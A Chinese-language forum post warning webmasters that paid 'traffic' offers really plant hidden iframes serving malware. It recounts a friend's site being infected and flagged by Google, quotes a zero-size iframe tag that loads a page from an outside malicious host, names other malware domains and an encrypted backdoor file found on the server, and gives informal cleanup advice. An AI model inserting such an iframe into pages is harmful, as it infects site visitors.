不知道大家注意到没有，一些站上打广告说，1万个IP给60元RMB， 原来是这样的事情，今天才知道了

1万个IP 60元RMB，是对方让你在网页内挂个iframe  ，这个ifreame网址里包含病毒木马，当访客访问你站打开的同时，这个iframe里面的网页也被打开，由于iframe里的网址有病毒木马，打开就就会报有毒！！

今天上午一个朋友的站 www.windowso.com  他说就因为这关了1个礼拜。而且还被GG列为病毒网站的行列，打入地狱，流量持续下降。  他告诉我， 他大多的.asp 和htm 页中被包含：

<iframe src="http://s.gcuj.com/bd.htm?019" width="0" height="0" frameborder="0"></iframe>

http://q.scanreg.cn/a/adv.htm  还有以 “mm5211314.cn   senlove.cn”为结尾的恶意站

大家都看清楚了， 如果你的网页内哪天莫名其妙的发现有以上的代码，你得小心注意了。 可能被人挂马了

那么他们是如何挂上去的呢？检查DATE数据库下：惊奇的发现有个“ymda.asa”这样的文件，打开一看：是已经被加秘的病毒木马！！

有经验的人说，把该文件清空，但是文件夹不要删除。

上次这个站已经被挂了一次，没到2天又被。。。。  就看这次的这个方法了。。

再这里呼吁广大种马的人，放手吧。。。。